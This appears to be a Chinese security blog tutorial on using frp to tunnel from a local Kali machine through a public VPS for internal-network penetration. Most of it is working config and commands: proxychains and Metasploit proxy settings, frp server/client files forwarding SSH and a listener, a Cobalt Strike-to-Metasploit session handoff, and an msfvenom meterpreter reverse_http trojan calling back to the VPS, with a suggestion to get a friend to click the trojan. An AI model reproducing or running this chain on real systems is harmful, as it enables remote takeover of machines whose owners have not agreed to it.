freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网隧道技术之frp:简单代理、msf反弹shell、CS联动msf
2021-04-09 14:23:27

前言

这篇文章介绍如何使用frp建立端口转发实现本地kali在公网ssh、本地msf在公网反弹shell;已经上线CS怎么联动本地msf

frp基础

1. 下载

下载地址

linux版在kali用,windows版在\/ps用

1617202234_60648c3a0050ec60a2dcd.png!small?1617202235480

2. kali设置代理

vi /etc/proxychains4.conf

socks5 1.166.166.6 7777

1617215199_6064bedf5f59e9b428c66.png!small

使用的时候可以在命令前加proxychains

1617215347_6064bf73c7e51e10ae652.png!small

3. msf设置代理

setg Proxies socks5:1.166.166.6:7777
setg ReverseAllowProxy true

1617215456_6064bfe04a14e5b3fc06b.png!small

4. windows设置代理

使用Proxifier工具

一级代理

1617214945_6064bde1165815b2561e5.png!small?1617214946554

1. \/PS配置服务端frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7000

运行

frps.exe -c frps.ini

2. 内网机器配置客户端frpc.ini

# frpc.ini
[common]
server_addr = 1.166.166.6
server_port = 7000
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5

运行

frpc.exe -c frpc.ini

3. 使用代理

ssh端口转发、msf反弹shell的端口转发---代理配置

在环境中,\/PS起到了桥梁的作用,使得两个内网可以相互通信

1617214123_6064baab156b2d5027b22.png!small?1617214124585

1. 环境描述

1.1 攻击目标内网

1.2 攻击桥梁\/PS(windows),ip:1.166.166.6

1.3 本地机器kali linux,ip:10.1.0.4

1.4 工具:frp

2. 服务端配置

\/PS为服务端,假设ip为1.166.166.6

将下载的文件放在\/ps,编辑frps.ini文件配置

1617202982_60648f26e7bc70af0cda8.png!small?1617202984398

[common]

bind_port = 60121
dashboard_port = 88
dashboard_user = admin
dashboard_pwd = zcv2!#sWE3x

参数说明:

[common] # 名字
bind_port = port # 指的是frp的服务端端口,用来和客户端kali建立连接
dashboard_port = port # 可视化监控平台的端口,访问这个端口会得到一个网页版的监控
# http://1.166.166.6:88
dashboard_user = admin # 网页版的登录用户名
dashboard_pwd = zcv2!#sWE3x # 网页版的登录密码

配置好之后保存,进行运行

frps.exe -c frps.ini

1617203561_60649169bdb8bb105bb50.png!small?1617203563291

3. 客户端配置

将文件放进kali,解压命令

tar -zxvf frp_0.36.2_linux_amd64.tar.gz

1617203431_606490e706d991b42b56f.png!small?1617203432602

配置kali,让在本地内网的kali,也能使用公网的IP进行访问,客户端的配置文件为frpc.ini

1617203104_60648fa00814bc6a39dfc.png!small?1617203105472

[common]
server_addr = 1.166.166.6
server_port = 60121

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 60122
use_compression = true

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 1234
remote_port = 60123

参数说明

[common]名称
server_addr = 1.166.166.6 # 服务器IP
server_port = 60121 # \/PS的端口,用来建立连接


[ssh] # 配置ssh登录的端口转发
type = tcp # 连接方式为TCP的方式
local_ip = 127.0.0.1 # 将本地的IP映射出去
local_port = 22 # 本地的端口为22
remote_port = 60122 # 映射的端口为60122,本地端口22映射到\/PS的60122
use_compression = true


[msf] # 配置msf的监听端口转发
type = tcp # 连接方式
local_ip = 127.0.0.1 # 本地IP
local_port = 1234 # 监听本地的端口
remote_port = 60123  # 映射的\/PS端口为60123,本地端口1234映射到\/PS的60123

在kali中运行

./frpc -c frpc.ini

1617203501_6064912d4332fa79c03d1.png!small?1617203502691

4. 访问一下frp的web管理页面

访问http://1.166.166.6:88,输入用户名密码登录

1617203679_606491dfd67ce3d4555ab.png!small?1617203681427

可以观察到流量的情况

1617203683_606491e3b25f666a603e3.png!small?1617203685175

5. 测试效果

ssh远程kali,前提是kali开启了远程连接

1617204648_606495a8049b097ff6369.png!small?1617204649522

CS联动MSF

将CS已上线的机器进行反弹到本地MSF

1. 在CS中新建一个监听

1617204994_60649702113b8ebba537c.png!small?1617204995585

1617204997_60649705174373b5bdeb0.png!small?1617204999116

点击Save保存

2. kali msf设置监听

由于上面frpc.ini配置的msf的1234端口映射到\/ps的60123

所以应该监听本地的1234端口,这里要写reverse_http,与CS对应

msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_http; set lhost 127.0.0.1; set lport 1234; exploit -j; "

1617205228_606497ecbaf46a5a6892b.png!small?1617205230658

3. CS中选择要联动MSF的会话,右键--增加会话--选择CS-MSF

1617205629_6064997d0cadb310fdca0.png!small?1617205630471

1617205631_6064997f7eeca600dda26.png!small?1617205632899

MSF上线!

1617205658_6064999a5d0711fcf0775.png!small?1617205659790

1617205697_606499c106349e5d4caef.png!small?1617205698447

内网MSF反弹内网shell

1. 生成msf木马

msfvenom -p windows/meterpreter/reverse_http LHOST=1.166.166.6 LPORT=60123 -f exe > zf.exe

因为生成的木马由内网机器运行,内网机器只能访问\/PS,不能直接访问本地的kali,所以LHOST是\/ps,LPORT也是kali映射到\/ps的端口

2. 设置监听

这里和CS联动msf的时候一样

设置监听的时候要考虑:1234是本地监听的端口,60123是\/ps的端口,60123的数据转发到kali的1234

msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_http; set lhost 127.0.0.1; set lport 1234; exploit -j; "

3. 找一个小伙伴的电脑点一下木马

kali上线

1617206873_60649e59100485fe74cf3.png!small?1617206874508

总结

内网渗透中隧道时必不可少的,frp搭建隧道相对比较稳定,功能也更加强大,常用的还有EW,都可以进行多级代理

参考

http://cn-sec.com/archives/80364.html

# msf # 端口转发 # 内网穿透 # 隧道传输 # 内网转发
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者